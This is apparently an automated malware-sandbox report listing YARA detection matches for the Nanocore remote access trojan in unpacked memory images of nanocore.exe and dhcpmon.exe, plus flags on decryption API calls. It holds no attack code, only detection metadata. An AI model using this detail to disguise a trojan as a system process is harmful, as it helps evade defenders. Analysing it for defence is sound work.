      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      YARA matches on unpacked PE images (type: UNPACKEDPE). Rule metadata, as carried by each rule:
        Nanocore_RAT_Gen_2: date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Nanocore_RAT_Feb18_1: date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        NanoCore: date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source | Matched rules:
        2.2.nanocore.exe.35ae3b6.5.raw.unpack | Nanocore_RAT_Feb18_1, NanoCore
        2.1.nanocore.exe.415058.1.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        10.2.nanocore.exe.415058.1.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        8.2.nanocore.exe.1eed1458.4.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        10.2.nanocore.exe.35431ec.6.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
        2.2.nanocore.exe.58b0000.12.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
        12.2.dhcpmon.exe.1ed91458.5.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        12.2.dhcpmon.exe.1ed80000.4.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        12.2.dhcpmon.exe.1ed80000.4.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        13.2.dhcpmon.exe.7130f0.2.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        11.2.dhcpmon.exe.400000.0.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        10.2.nanocore.exe.415058.1.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        10.1.nanocore.exe.400000.0.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        13.1.dhcpmon.exe.400000.0.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        10.2.nanocore.exe.353e3b6.7.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        13.2.dhcpmon.exe.34731ec.6.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1
        11.2.dhcpmon.exe.334e3b6.7.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        12.2.dhcpmon.exe.1ed91458.5.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        11.1.dhcpmon.exe.415058.1.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        11.2.dhcpmon.exe.715c48.2.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        11.1.dhcpmon.exe.415058.1.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
        2.2.nanocore.exe.5b31b8.2.raw.unpack | Nanocore_RAT_Gen_2, Nanocore_RAT_Feb18_1, NanoCore
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'CreateDecryptor'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs | Cryptographic APIs: 'TransformFinalBlock'
